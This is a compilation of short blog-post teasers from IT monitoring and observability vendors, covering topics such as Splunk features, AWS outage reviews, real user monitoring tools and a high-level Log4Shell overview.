Beyond VMware Horizon, eG Innovations includes purpose-built, fully integrated modules for other VMware technologies and even third-party products likely to be used alongside Horizon. Technologies supported include the Blast Extreme protocol, VMware Unified Access Gateway (UAG), thin clients, and of course, App Volumes. Today, I’ll focus on how to ensure that you can monitor App Volumes both via full insights via App Volumes Manager but also via continuous monitoring of user endpoints.

A Year of WebPageTest and Catchpoint: A Q&A with Tim Kadlec and Jeena James

Look out for our other video Q&As this week with Catchpoint co-founders, Mehdi Daoudi, CEO and Dritan Suljoti, Chief Product and Technology Officer. ‍Jeena: Can you tell us what you've been up to, what you've been doing with the team for the last couple of months, and how's it been so far with Catchpoint and WebPageTest?

Replay Log in Distributed Icinga Environments

An essential part of a distributed monitoring environment with Icinga that includes master, satellite and agent nodes is the replay log functionality. The replay log is a built-in mechanism to ensure nodes in a distributed setup keep the same history e.g. check results, notifications and downtimes if nodes are temporarily disconnected and then reconnect.

Tutorial: Getting Started with AWS Lambda and Node.js

AWS Lambda is an incredible tool that works well with an abundance of other services on AWS. In this hands-on walkthrough, we’ll show you how to get started and create your first Node.js AWS Lambda function. Once upon a time, not so long ago, a word caught my ear. Lambda. That struck a chord, remembering the good old days of playing Half-Life as a kid. Little did I know what AWS Lambda was and how incredibly awesome it is. If you’re intrigued, stick around.

Splunk RUM Frontend Error Monitoring is Now Generally Available!

Debugging errors is an essential component to SRE and developer workflows. “How do we prioritize and isolate JavaScript errors more effectively?” is a top challenge we hear from engineering teams looking to improve end-user experience. Therefore, we are excited to announce the general availability of Splunk RUM frontend error monitoring.

Five Critical Insights You Won't Get With Your Cloud Provider's Monitoring Solution Alone

When meeting with a current or prospective Splunk customer, one question we are often asked is “Why do I need Splunk when I can just use AWS Cloudwatch, Azure Monitor, or GCP Cloud Operations Suite (formerly known as Stackdriver) for my cloud monitoring needs?” And what a great question it is!

The 2022 State of Observability Report

Interest in observability is at an all-time high. When we attended KubeCon in Los Angeles in October, observability and security were everywhere—in conversations with attendees and other vendors, during sessions, and in messaging at booths—indicating that there’s still an unmet need. In fact, Gartner declared that observability is at the ‘peak of inflated expectations' in a recent Hype Cycle report.

JavaScript security: Vulnerabilities and best practices

If you run an interactive website or application, JavaScript security is a top priority. There’s a huge array of things that can go wrong, from programmatic errors and insecure user inputs to malicious attacks. While JavaScript error monitoring can help you catch many of these issues, understanding common JavaScript security risks and following best practices is just as important.

A first look at Amazon CloudWatch Real User Monitoring

Real User Monitoring (RUM) has been providing valuable insights into real user experiences for many years. It’s not every day that we see a new player enter the market, but last week we did, and a very powerful player at that – Amazon. Real User Monitoring for Amazon CloudWatch was announced at AWS re:Invent 2021, adding to their existing suite of over 200 products and services. As you can imagine, our ears perked up at this announcement and we’re eager to take a look.

Speed vs Uptime | Where to Focus This Holiday Season

Revenue and consumer confidence are at stake this holiday season for brands worldwide. Shoppers are on the prowl for deals, and their predator instincts hunt for bargains in milliseconds. Google cites convenience, price, and availability as the top three reasons why consumers choose to shop online. Today’s online shopping has built an expectation for ease of use, and consumers have evolved into apex shoppers.

Our $350M funding round will accelerate our cloud and container security momentum into global scale

I am excited to announce today that we have raised an additional $350M at a valuation of $2.5B, more than doubling our valuation and bringing our cumulative funding since inception to ~$750M. This funding reflects investor conviction in our ability to be the dominant cloud and container security platform, and brings us closer to our vision of helping every organization to confidently run modern, cloud-native applications.

11 Best Bugsnag Alternative You Should Try

Bugsnag is a stability error monitoring solution which captures unhandled exceptions, diagnostic data, and version information in browser, mobile and server-side applications via open source SDKs for 50+ software platforms. By default, Bugsnag libraries capture all crashes (handled exceptions are optional), version numbers, and session information to help engineering teams proactively surface issues and save time fixing bugs.

Sponsored Post

How to Manage Your AIOps for Optimal Efficiency

“Have you tried shutting it off and turning it back on?” While AIOps won’t likely remove this query from our vocabulary any time soon, technology is certainly here to take on a bulk of the heavy lifting. For all-sized companies, service calls are still going to continue to pour in. And, there’s no sign of any of the world’s CompTIA certs going to waste in the near future. Still, thanks to AIOps, many jobs within the world of IT will become more streamlined.

Identify operational issues quickly by using Grafana and Amazon CloudWatch Metrics Insights

Amazon CloudWatch has recently launched Metrics Insights (Preview) — a fast, flexible, SQL-based query engine that enables you to identify trends and patterns across millions of operational metrics in real-time. With Metrics Insights, you can easily query and analyze your metrics to gain better visibility into the health and performance of your infrastructure and large scale applications.

The Best Tools for System Monitoring

It takes a lot to run a modern business. From websites to technical solutions and everything in between, it’s no surprise we need better monitoring systems to make sure everything is operational. With multiple gears turning at once on any given platform, incidents are inevitable—especially for companies that are constantly growing and innovating. And the impact of incidents can affect user services, operations, and even business reputation.

Metric Correlations using unlimited data for monitoring and observability

Correlate your monitoring metrics to make even better decisions about how to handle incidents in your infrastructure using our Metric Correlations. You can now select an unlimited amount of time to troubleshoot all of your monitoring metrics. Netdata’s free, open-source monitoring agent works with Netdata Cloud to help you monitor and troubleshoot every layer of your systems to find weaknesses before they turn into outages.

How to find cloud logs and manage logging costs

We covered best practices for ingesting, centralizing, and managing cloud logs in our previous episode. But how can you quickly find the logs you're looking for when troubleshooting? And how can you manage and optimize your logging costs? In this episode, we'll show you how to use advanced log queries to find the exact logs you're looking for and how to manage logging costs.

Increase resilience: Respond to change with Avantra custom checks

SAP’s products, technology and development are rapidly changing. Once focused on on premise applications, SAP’s focus on rapid innovation in cloud technologies brings exciting, transformative change to your business. But it has also upended the way these new business critical applications need to be supported and administered.

Avantra 21.11: Extend Avantra with critical checks and automations

What makes the Avantra platform incredibly powerful for our customers is the ability to extend the standard checks and automations available with your custom business logic. While Avantra has an opinion of the key things to monitor in your landscape, we often hear of our customers building business critical checks and automations to extend Avantra and add features to look after the things your business cares about.

A Year of WebPageTest and Catchpoint: A Q&A with Dritan Suljoti and Jeena James

As all of us at WebPageTest and Catchpoint celebrate one year of partnership, Jeena James, WebPageTest, sat down for a Q&A with Dritan Suljoti, Chief Product and Technology Officer and co-founder, Catchpoint, to look at the key milestones from the last year, and ahead at what's next! Hope you enjoy!

Incident Review: Another Week, Another AWS Outage

The following is an analysis of the Amazon Web Services incident on 12/15/2021. It may be the holiday season for most of us, but for AWS it appears to be Groundhog Day, Bill Murray style. For the second week in a row, the company reported an outage, this time affecting its US-West-2 region in Oregon and US-West-1 in Northern California.

Introducing Icinga Module for vSphere - Releasing version 1.2

One of the pillars of Icinga is integrations. With it’s open APIs and various extensions, Icinga is capable of integrating seamlessly into your existing infrastructure. Today I want to give you an introduction to our VMware integration and share some details about the latest release. The Icinga Module for vSphere® is an Icinga module dedicated to collecting, monitoring and visualizing data from your VMware environment.

Do you know what BYOD, BYOA, BYOT are? No? You lack experience!

We apologize in advance for this extremely freaky reference: If in the well-known science fiction saga Foundation there was a duty to collect all the information of the galaxy to save it, at Pandora FMS we have assigned ourselves the task of making a glossary worthy enough with all the “What are” and the “What is” of technology. And today, without further delay or freakiness, it’s time to define the acronyms: BYOD, BYOA, BYOT.

AWS Machine Learning Tools (2022 edition)

When you want to stay ahead and on top of things in a fast-moving industry, machine learning (ML) is surely one of the trending solutions. Today, innovative companies already have leading Machine Learning tools well-integrated into their processes. In comparison, your start could seem dreadfully slow. Or maybe you just don’t have the time or resources to invest in running your own Machine Learning training infrastructure.

Anomaly Detection

IT Operations has a wide spectrum of roles and responsibilities. The positions range from level 1 (L1) operators to Site Reliability Engineers (SREs) and everything in between. L1 operators, for example, are (often) almost exclusively reactive. They feed off the constant stream of incidents reported by clients and events that are reported by monitoring and alerting systems. This is in contrast to SREs, who work at the other end of the spectrum.

Splunk Mobile, iPad, AR and TV in Private Networks

Having Splunk Mobile available in your pocket is great, but what if you're not able to take advantage of it because of Defense Federal Acquisition Regulation Supplement (DFARS) requirements or security concerns? Through this blog post, you'll learn how deploying a Private Spacebridge might be the right answer!

Citrix Provisioning Services Monitoring

Bottlenecks and performance issues in the PVS servers might cause long boot times and the inaccessibility of desktops and applications. Monitoring of PVS servers and their performance is therefore essential. The keys to proactively identifying PVS problems are in-depth visibility of key performance indicators of the server operating system (MEM, IOPS), the infrastructure (PVS services, PVS streaming errors), and the underlying component layers (PVS sites, vDisks, target devices, etc.).

The Log4j Log4Shell vulnerability: Overview, detection, and remediation

On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. In this blog post, we will: We will also look at how to leverage Datadog to protect your infrastructure and applications.

You can now monitor the health of your application and server

We're proud to announce that we have added a major new feature to Oh Dear: Application Health monitoring. Using Oh Dear, you can now monitor various aspects of your application and server. This way, you could get alerts when: You can monitor any aspect of your app that you want.

Get Started with the Public Beta for Unified Dashboards

During Logz.io’s ScaleUp 2021 user conference, we announced that Unified Dashboards were coming to you soon. And now it’s finally here for anyone to try during the Public Beta. Unified Dashboards will allow Logz.io customers to analyze and filter their logs, metrics, and traces side-by-side on a single monitoring dashboard. Check out our recent blog to learn about why we built Unified Dashboards and the value they bring to customers.

Splunk AR - What's new .conf 2021

Want to deploy Splunk AR out in the field? Splunk AR is a powerful application that allows field workers to quickly gain valuable insights from assets in your deployment. With Splunk data supporting them, field workers can take action. In addition, we’ve built a powerful admin suite to support making an AR experience seamless and manageable. In this video, we talk about all the new capabilities we’ve built in 2021 for Splunk AR and how your company can take advantage of it.

How to Measure Network Latency | Obkio

Latency is one of the core network metrics that you should be measuring when monitoring your network performance. Latency refers to the round-trip measure of time it takes for data to reach its destination across a network. Consistent delays or odd spikes in time when measuring latency are signs of major performance issues in your network. The most accurate way to measure Latency is by using a Network Monitoring Software, like Obkio.

Bytecode transformations: The Android Gradle Plugin

This is the first part of a blog post series about bytecode transformations on Android. In this part we’ll cover different approaches to bytecode manipulation in Java as well as how to make it work with Android and the Android Gradle plugin. In the next two parts we’ll dive into the actual bytecode, bytecode instructions and how we can modify the bytecode and inject our own instructions, using Room as an example.

How to Find, Fix, and Prevent Node.js Memory Leaks

When your application starts to grow, one of the essential factors to consider while scaling is memory management. Poor memory management leads to memory leaks, thus affecting application performance. When the performance degrades, it will directly affect the business. So, it is essential to look out for and fix memory leaks in time. This blog post will look at what memory leaks are and how to avoid them in Node.js applications. Feel free to navigate the post using these links.

Coralogix is Live in the Red Hat Marketplace!

Coralogix is excited to announce the launch of our Stateful Streaming Data Platform that is now available on the Red Hat Marketplace. Built for modern architectures and workflows, the Coralogix platform produces real-time insights and trend analysis for logs, metrics, and security with no reliance on storage or indexing. Making it a perfect match for the Red Hat Marketplace. Request a Demo.

The Future of Open Source: Is it Sustainable?

Open Source projects are at the heart of most software that we depend on everyday. Community-supported volunteers work behind the scenes to make open source better for everyone, but it can be a thankless—and penny-pinching—job. Is it sustainable? Join us in a live virtual event with GitHub Sponsors to find out. We’ll showcase leading maintainers in the community and discuss the future of open source sustainability.

Perfecting the Customer Onboarding Experience for MSPs

Onboarding is an in-depth process that sets the stage for relationships with Managed Service Providers (MSPs) and their customers. Perfecting the onboarding experience will give customers the confidence that choosing an MSP to manage their IT was, and is the best choice. A poor first impression can damage credibility, so it’s vital to have a solid plan in place.

Why is my SaaS application so slow?

Many companies today rely on SaaS connections in order for the business to function. Some users simply can’t operate in their job when an application becomes unavailable. When hundreds of users are impacted, this can cost a company serious money. That’s why keeping a proverbial finger on the pulse of application performance is generally worth the effort. But, it isn’t easy. Many popular SaaS applications are delivered from hundreds of locations around the world.

How to Perform Point-in-Time Recovery of a SQL Server Database

In a previous post in the backup and restore series, How to Restore Databases From Native SQL Server Backups, Tim mentioned some more advanced options when restoring a database backup, including performing point-in-time recovery of a SQL Server database (sometimes known as PITR). In this tutorial, I’ll build on the information in Tim’s post by showing you how to use backups to perform point-in-time recovery and a more advanced way to determine an exact point to restore to.

Gartner IT IOCS Highlights: How Accenture Powers Automation Through Observability and StackState's 4T Data Model

Accenture’s vision for value-led, business-aligned operations applies Machine Learning, Automation and Observability to help cloud-hosted and on-premise systems diagnose and heal themselves. The company’s ubiquitous myWizard® platform, used by 100,000+ practitioners at more than 3000 companies, applies StackState’s advanced 4T Observability data model to improve service to Accenture’s customers.

A Year of WebPageTest and Catchpoint: A Q&A with Mehdi Daoudi and Jeena James

As WebPageTest and Catchpoint celebrate one year of partnership, Jeena James, General Manager, WebPageTest, sat down for a Q&A with Mehdi Daoudi, CEO and co-founder, Catchpoint, to look at the key milestones from the last year, and ahead to what's next! Hope you enjoy!

5 Network Traffic Analysis Tools to Know About

Network traffic analysis serves many purposes. It’s used for general network monitoring, security reasons, as well as the debugging of network issues. It can be helpful not only to network administrators but also to application developers. In this post, you’ll learn what network traffic analysis tools actually are and what are the top five you should know about.

HoneyByte: Using Application Metrics With Prometheus Clients

Have you ever deep dived into the sea of your tracing data, but wanted additional context around your underlying system? For instance, it may be easy to see when/where certain users are experiencing latency, but what if you needed to know what garbage collection is mucking up the place or which allocated memory is taking a beating? Imagine having a complete visual on how an application is performing when you need it, without having to manually dig through logs and multiple UI screens.

What's New with DX Unified Infrastructure Management 20.4

DX Unified Infrastructure Management (DX UIM) enables comprehensive infrastructure observability. The solution delivers comprehensive coverage, modern administrative and operator consoles, zero-touch configuration, advanced alarm management, and more. This solution provides a unified, data-driven approach to infrastructure management. With the solution, your teams can proactively and efficiently manage all your digital ecosystems, including private and public clouds.

Enabling the Self Driving Cloud with Splunk Observability Cloud and GKE Autopilot

In 2021, any time that you access any kind of web service, whether it be via a website or app, chances are high that the backend is running on Kubernetes. Hundreds of thousands of organizations rely on Kubernetes to power and manage their mission critical services every day, and the reliability and scalability benefits offered by Kubernetes have been felt across the industry.

Host and process metrics - monitoring beyond apps

Consumers and users of applications expect near 100% availability and reliability to work, transact, collaborate, etc. There’s a lot of talk about monitoring the performance of the application itself, but what about the underlying systems and components supporting the app, and in particular the infrastructure it sits on? If any piece of this stack fails, it can negatively impact the user experience, and in turn, your business.

The 5 Biggest Internet Of Things (IoT) Trends In 2022

The Internet of Things (IoT) is a term that describes the increasingly sophisticated ecosystems of online, connected devices we share our world with. The slightly odd name refers to the fact that the first iteration of the internet was simply a network of connected computers. As the internet grew, phones, office equipment like printers and scanners, and industrial machinery were added to the internet.

Top 5 SCOM issues and how to solve them

Many organizations aspire to a world where everything is in the cloud. But, in reality most IT enterprises still rely on traditional on-prem monitoring technologies. As a market-leading monitoring tool, SCOM is ideally placed for the job; monitoring both on-prem workloads or workloads that link up to the cloud. So, as SCOM is central to most companies’ monitoring, it is essential you understand how to be successful with SCOM!

Upcoming Holidays Got You Down? Plan to Start 2022 off Right

With the holidays coming up are you worried about Microsoft 365 and Teams performance while your IT team is off? Martello gives IT teams complete end-to-end visibility of the Microsoft 365 and Teams user experience to rapidly detect and easily resolve problems before they impact the user experience so you can finally take that break you deserve.

Query and analyze Amazon S3 data with the new Amazon Athena plugin for Grafana

In collaboration with the AWS team, we have recently released the new Athena data source plugin for Grafana. Athena is an interactive serverless service that makes it easy to analyze data in Amazon S3 using standard SQL. Athena supports a wide variety of data formats including CSV, JSON, ORC, Arvo, and Parquet. Athena also integrates with AWS Glue Data Catalog, which allows you to create tables and query data based on a central metadata store of many AWS services, such as CloudFront, ELB, and more.

Monitor Scheduler Utilization in Elixir With AppSignal

When it comes to monitoring your Elixir application, it's challenging to make sense of the many metrics and statistics that you can read from the internals of the Erlang virtual machine. In this post, we'll be looking at the scheduler utilization metric in order to understand what it is, why we should monitor it, and how to monitor it.

Let the Orion Platform Do the Heavy Lifting | Using the Orion API for Fun and Profit: Session 2

Continuing the discussion from the previous THWACK Livecast about letting the Orion® Platform products automate your work, we’ll be stepping away from the web console and start digging into the SolarWinds Orion Application Programming Interface (API). The power of the Orion API is in its flexibility. If you want to unmanage or mute devices to coincide with your change management windows, or do bulk actions on devices, or even add devices to monitoring from nothing more than an IP address, it can be done with the API.

2021 AWS Outage and How To Prevent Your Websites and Applications From Being Impacted

December 7 started as a typical, but busy, pre-holiday weekday. This included a mix of booming online retail sales ($33.9 billion spent during cyber week), packages flooding delivery services, and high online traffic. But much of that quickly came to a crawl. An outage of the AWS us-east-1 cloud region changed the good fortune for many websites and applications and impacted the lives of consumers across the United States and parts of Europe.

WebPageTest and Catchpoint: Our Year Building and Growing with the Community

WebPageTest recently completed a year as part of the Catchpoint family (yes, we acquired a company during the pandemic). In the past twelve months, we have built an entire WebPageTest team to power the developer experience around web performance. We’ve also launched initial premium experiences on the platform. Our developer community continues to contribute to the beloved open-source version, as well as share best practices with other users.

You are a sinner (of data management)!

Let’s get to the point about data management: Businesses need data, but accumulating too much can be detrimental. Data overcrowding can corrupt IT professionals, turning them into greedy hoarders. Being indigestible with excessive repeated, outdated or banal information, the so-called ROT data, is bad. Companies of the world! The Devil tempts you with Big Data! Something that, if too much, could be harmful! We tell you all about it in this article.

Enterprise IT Dashboards

Interpreting data and making fast decisions is critical for any leader in today's business world. But how is it done? Everyone remembers the old way of doing things where analysts would manually crunch the numbers and give a final output. This business intelligence would be presented to their boss, and decisions would be made. This batch way of running numbers and presenting them is not sustainable due to the massive amount of manual effort involved to recompile datasets and present them properly.

Splunk Cloud Self-Service: Announcing The New Admin Config Service API For Private Applications

In our last blog, "Splunk Cloud Self-Service: Announcing the Admin Config Service (ACS)" we introduced our modern, cloud-native API that is enabling Splunk Cloud Platform admins to manage their environments in a self-service fashion. In this blog, we take a look at our latest effort to empower our customers: ACS private app management.

A Full Guide on Using Application Monitoring for Your Business

Wondering whether you can optimize your business using application performance monitoring? The answer is “Surely!” Our full guide on application monitoring usage will serve as proof. Contemporary businesses and startups depend on software applications for running their digital activities and supplying SaaS or AaaS (application-as-a-service). Nowadays, expedited application and service delivery without sacrificing quality is a top concern.

The Future-Proof Experience Framework w/ Tech Mahindra

Time is a luxury that IT workers don’t often have – and that’s particularly true after the massive upheaval all of our businesses have experienced since the pandemic. Ever since the working model changed overnight and digital transformation accelerated to warp speed, IT teams have had to implement new initiatives quickly in order to keep up. But how can they know that these initiatives have been successful?

TL;DR InfluxDB Tech Tips: IoT Data from the Edge to Cloud with Flux

When it comes to writing data to InfluxDB, you have a lot of options. You can: The last bullet is the most powerful and flexible way of maintaining and managing your fleet of IoT devices. That architecture offers you several advantages including: Architecture drawing of the last bullet. Sensors write data to an OSS instance of InfluxDB at the edge which in turn write data to InfluxDB Cloud.

What is the Log4j 2 Vulnerability?

Over the last few days, there have been a tremendous amount of posts about the Log4j 2 vulnerability, with Wired going so far as claiming that, “the internet is on fire.” Tl;dr: LogDNA is not exposed to risk from the Log4Shell vulnerability in Log4j 2 at this time. If that’s all you came for, you can stop reading here. If you want to learn more about the vulnerability and how LogDNA protects you from risks like these, grab a cup of coffee and read on.

Cloud computing has won. But we still don't know what that means

There’s little doubt that cloud computing is now the absolutely dominant force across enterprise computing. Most companies have switched from buying their own hardware and software to renting both from vendors who host their services in vast anonymous data centers around the globe.

Observability Vs Monitoring: Key Differences You should know

In the computing world, Observability and Monitoring has got an important place. The recent days have witnessed a great use of these terms in the IT infrastructure and among the developers, as observability and monitoring have been extremely effective in tracking the events. Both systems are intertwined to each other, but there is a small line of separation among the two. What? Why? What's the difference? These are the questions that has to be answered. Let's figure out the reasons here.

Observing Kubernetes With LM Logs

As more and more IT organizations move towards containerized workloads and services, it is more important than ever to have insight into the containers and the services running within. Leading the container orchestration charge is Kubernetes (aka k8s – the 8 represents the letters omitted from the middle of the word). In fact, about two-thirds of IT engineers have seen their Kubernetes option increase during the pandemic as there becomes more need for scaling and performance.

Dashboard Fridays: Sample Zendesk Support Dashboard

Our Support Team wanted a real-time overview of all the cases currently in play so they could monitor multiple channels in one place. This dashboard gives the team a real-time view of their tickets by type, status, topic, and more! Join Adam Kinniburgh and our Customer Support Manager Mike Halfacree as they showcase this sample Zendesk dashboard - how it's made, who it's for, the challenges it solves and how you can easily replicate it!

SAP HotNews analysis: What MSPs need to know

SAP is one of the most business critical enterprise applications. As a result, keeping it secure is a top priority for managed service providers. In the last year SAP has notified its customers of multiple high risk vulnerabilities, through its SAP HotNews email alerts, which require urgent patching – but the challenge for MSP clients is to know “do these impact me?”

What are Linux Logs? How to View Them, Most Important Directories & More

In software, it’s essential to monitor logs of system activities. Today we’ll unravel what Linux logs are and how you can view them. Logging is a must for today’s developers and why Retrace was designed with a built-in, centralized log management tool.

AWS outage leaves millions in the dark, points to need for better API monitoring

Millions of users of popular apps, such as Facebook, Ring, Alexa, Disney+, and more were left scratching their heads wondering when they would be back online due to a widespread Amazon Web Services (AWS) outage Tuesday. The outages were centered on a number of core AWS services in the US-EAST-1 Region, including increased API error rates with Amazon DynamoDB, Amazon Elastic Compute Cloud and Amazon Connect, which handles contact center calls. — AWS Service Health Dashboard

Monitor and optimize S3 storage with Amazon S3 Storage Lens metrics

With Amazon S3’s scalable object storage, you can store and manage billions of objects across multiple AWS accounts, regions, and storage classes. S3 Storage Lens provides 29 useful metrics that give you deeper visibility into your S3 usage and activity across your entire organization. We are proud to be a pre-integrated AWS partner using the new CloudWatch publishing option to bring S3 Storage Lens metrics into Datadog for enhanced S3 storage monitoring.

Why are so many BMC customers looking to replace their Middleware Management ("BMM") solution?

A growing number of BMC users are looking for a suitable replacement for BMC’s Middleware Management (“BMM”) solutions. The most frequently cited reasons for which these organizations are looking to replace their BMC software include: Nastel’s core business is Integration Infrastructure Management (i2M). Nastel believes that the Integration Infrastructure (commonly known as “middleware”) is the nervous system of every digitally integrated business.

Designing and Migrating to a Service-Centric Management Model with ScienceLogic

As enterprises begin to migrate away from device-centric management to a service-centric model of IT operations, it is vital that IT operations and management (ITOM) leaders start by addressing the need for comprehensive visibility across their IT infrastructure. Gaining a contextual view of your full-stack service topology, based on real-time collection of data, is necessary to keep pace with the speed of change inherent with today’s dynamic and fast-paced business environment.

Monitoring VMware Horizons App Volumes with eG Enterprise

VMware App Volumes is a powerful technology that enables the real-time delivery and lifecycle management of applications. Learn how eG Enterprise supports fully integrated live monitoring and alerting for App Volumes without the need for custom scripts and full historical reporting.

What is External Services Monitoring, and Why is it Important?

There are a lot of important components needed to run a successful web application. The language you code it in, which developers are working on the project, and the integrations with other services are enormous aspects of the process. One essential part of running an application, however, is monitoring.

How Monitoring as a Service helps you achieve resource-efficient success!

Microsoft's System Center Operations Manager, SCOM, is a resource-intense tool to work with. Not the least when it comes to competence and time. The SCOM platform can come across as rather heavy to work with and often requires some expertise to take advantage of its benefits fully. According to our experience, SCOM also lacks some attraction for the new generation of employees, even though they are prone to move towards a career in IT.

Prioritize the Right Performance Monitoring Metrics

Now every developer can customize the performance monitoring charts and data views on the Performance page to see what is most important to them and their team, helping prioritize relevant performance monitoring metrics so they can take action faster. And when you jump back into Sentry Performance, the page is saved right where you left off. Say you’re working on a new release. You can edit your Performance page to include User Misery, Transaction Throughput, and Failure Rate.

ElasticON Global Opening Keynote: Solving for Innovation

Join co-founder and CEO Shay Banon, Chief Product Officer Ash Kulkarni, and special guest Scott Guthrie, Executive Vice President of Cloud and AI at Microsoft, to hear the latest about Elastic’s vision for the future. Speakers: Shay Banon, Founder & CEO, Elastic Ash Kulkarni, Chief Product Officer, Elastic Scott Guthrie, Executive Vice President of Cloud and AI, Microsoft

Elastic Observability Keynote: Unified, Actionable, Frictionless

Elastic Observability makes it easier for organizations to store, search, and analyze any type of data, from any source, to keep systems running (and customers happy). And with our most recent release, we’ve continued to make this even faster and simpler, from automated root cause analysis to centralized agent management with Elastic Agent. Join the keynote to learn what’s on the Elastic Observability roadmap and how upcoming innovations will continue to break down barriers for users with frictionless onboarding, integrated workflows, and actionable observability with AIOps.

Microservice Choreography and Triaging Errors with Elastic Observability and the Elastic Stack

Brolly is Australia’s leading social media archiving service, comprising dozens of microservices deployed to Kubernetes. Learn how Brolly leverages the Elastic Stack to collect pod and infrastructure logs, keep track of failures in the data pipeline, and identify and recover from errors. Speakers: Salman Ahmed, Solutions Architect, Brolly Omid Mirzaei, Software Engineer, Brolly

Unifying VM and microservice monitoring with Kubernetes, Prometheus, and Grafana

According to a 2020 CNCF survey, the use of containers in production has been rapidly increasing for the past several years. Nutanix, a global leader in cloud software and a pioneer in hyperconverged infrastructure solutions, is part of that trend.

New release MetrixInsight for CVAD - v1.4.21000.x

GripMatix is Citrix partner and market leader providing SCOM Management Packs for monitoring Citrix Virtual Apps and Desktops, Citrix License Server, Citrix Provisioning Services, Citrix StoreFront and Application Delivery Controller, formerly known as Citrix NetScaler. Our solutions have been tested and verified within the Citrix Ready program. Besides quality updates, we continuously work on developing new features to improve your Business Continuity and Performance even further.

Atlassian: Accelerating Observability in the Data Age

Atlassian, a leading provider of team collaboration and productivity software, aims to merge the analytics and observability space to deliver consistent, reliable experiences to customers. See how Atlassian manages its DevOps environment to drive business transformation. Colby Funnell, Head of Observability, also shares the company’s vision for OpenTelemetry.

What is eBPF and Why is it Important for Observability?

Observability is one of the most popular topics in technology at the moment, and that isn’t showing any sign of changing soon. Agentless log collection, automated analysis, and machine learning insights are all features and tools that organizations are investigating to optimize their systems’ observability. However, there is a new kid on the block that has been gaining traction at conferences and online: the Extended Berkeley Packet Filter, or eBPF. So, what is eBPF?

Web Performance of the World's Top 50 Travel Sites in 2021

2021 holiday travel has been a rebound for the industry. Just this week, I was attempting to purchase flights for a long weekend before travel picks up for the holidays. However, after a failed attempt to sign up for their Executive Club and enduring slow page loads after every click, I abandoned the site and booked elsewhere. Just like that, I was a lost customer.

AWS Cloud Performance Anomaly Detection - A Real-life Case Study

Here’s a myth that needs to be debunked – the cloud will take care of my performance problems! Our experience shows that cloud architecture usually introduces new layers of complexities that did not exist in the on-premises world. You need a modern AI-powered full stack monitoring solution to find the needle in the multi-layered haystack that is the cloud. Sometimes, it’s the cloud vendor who has to fix the issue.

Why you Need WiFi Observability in the Era of Work From Anywhere

“Work from anywhere” is now a common occurrence. With so many companies now dependent on a distributed workforce, IT teams need to be able to quickly diagnose and troubleshoot WiFi problems. Moreover, they, themselves, are often working remotely. In order to successfully do their jobs, consistent WiFi is obviously essential for remote workers.

EC2 Reserved Instance: Everything You Need to Know

An Amazon Reserved Instance (RI) is one of the most powerful cost savings tools available on AWS. It’s officially described as a billing discount applied to the use of an on-demand instance in your account. To truly understand what RI is, we need to take a step back and look at the different payment options for AWS.

Migrating to DX APM FAQs

Migrating to Broadcom’s next-generation DX APM will provide you with the benefits of a modern architecture, high scalability, and comprehensive observability. With its advanced capabilities, the platform can support your organization’s monitoring needs long into the future. For your convenience, below is a summary of frequently asked questions and answers on migrating to DX APM.

High Five: The Latest Integrations from Splunk, Microsoft and GitHub

Hello Splunk Nation! Welcome to the latest roundup of Splunk integrations with Microsoft and GitHub! Hopefully, you had a chance to virtually attend.conf21 and check out all the amazing content. For those of you who missed it, we’re recapping the Microsoft, GitHub and Splunk highlights below.

The Top 8 Website Monitoring Tools in 2021

Every business owner understands the importance of website monitoring. It is essential to take steps to avoid performance and availability issues on websites. A great start would be to examine every aspect of your web infrastructure. That's where website monitoring tools come into the picture. You can continuously observe your website's performance and uptime with website monitoring services. These tools make you aware of any server downtime or connection issues.

Responsible For Your O365 Budget? Rightsize Your Licenses Now To Avoid Extra Cost!

Pricing for most Microsoft 365 (M365) and Office 365 (O365) suites are due to increase on 1 March 2022 by up to a whopping 25%, prompting many I&O leaders to assess their Microsoft cost optimization options before their next renewal. Microsoft first revealed the price increase on 19 August 2021, and are justifying the decision by making a wider set of features and services available, such as security, audio services or device/user management, regardless of whether they’re required.

Accelerating Cloud Monitoring via the Logz.io Azure Native Integration

Watch this Logz.io and the Azure Cloud team webinar to learn about the Logz.io Azure Marketplace native integration. More specifically, about: Collecting logs from Azure resources or applications in minutes with Logz.io — all within the Azure Portal. Integrate Logz.io with Active Directory SSO for access control. Collect their logs through a new “pay for what you use” pricing model — rather than committing to log volumes and plans upfront.

The 9 best Real User Monitoring tools for 2021: A comparison report

Real User Monitoring (RUM) provides visibility into the performance experience of live users interacting with your web, mobile, or single-page apps. RUM tools emerged to bridge the gap between application performance metrics and the impact on real people. These days, user experience is increasingly factored into the development process, but that still doesn’t stop slowdowns.

DevOps and monitoring: the perfect pair when they work together

Organizations throughout the globe have been working for years trying to find more efficient ways to remove the barriers hindering the speed at which computing services and applications are rolled out to market. These barriers often present challenges for how DevOps and monitoring work together. Between the requirements-and-design phase, to planning and development, to testing, software projects can take between 4 to 9 months to complete depending on their size and complexity.

Secure HashiCorp Vault with Datadog Cloud SIEM

HashiCorp Vault provides centralized storage and management of passwords, API keys, tokens, and other secrets that distributed applications can use to operate securely. Vault clients—services and applications that access secrets programmatically, as well as users who interact with a Vault server—can create, update, and read secrets based on the permissions you grant them.

What we learned from AWS's us-east-1 outage

In case you missed it, for several hours on December 7, 2021, AWS's us-east-1 region had an outage impacting multiple AWS APIs, taking out various websites across the internet. According to our own monitoring at OnlineOrNot, the outage started at 2021-12-07 15:32 UTC and began to recover well at 2021-12-07 22:48 UTC (with minor signs of life for a few minutes around 2021-12-07 20:08 UTC). Had we relied solely on AWS to update their status page before reacting, we would have been waiting a while.

Why the Return to the Office Can Kill Microsoft Teams Performance

With the participation of Cam Smith, Microsoft Teams Product Manager at Microsoft Canada. What Teams performance challenges will organizations face as they return to the office, and how do you avoid them proactively? This educational webinar will showcase these topics.

Overcoming challenges remote working has created for enterprise IT teams

I recently joined Neil C. Hughes on his podcast TechFusion by Citrix Ready to discuss the challenges that remote working has thrust upon enterprise IT teams. I’ve followed Neil’s work for some time from afar, so it was a joy to meet him and appear on his podcast alongside of Allan Furmanski, the lead product marketing manager for Citrix Virtual Apps and Desktops.

7 Reasons Why MSPs Benefit From IT Automation

Automation has become the backbone for businesses wanting to stay afloat in the highly competitive markets today. Managed Service Providers (MSPs) are among those reaping heavily from IT automation processes. The benefits MSPs obtain from IT automation include lower costs, reduced errors, and increased productivity. With automation, MSPs can acquire better data, become more reliable, and scale their operations.

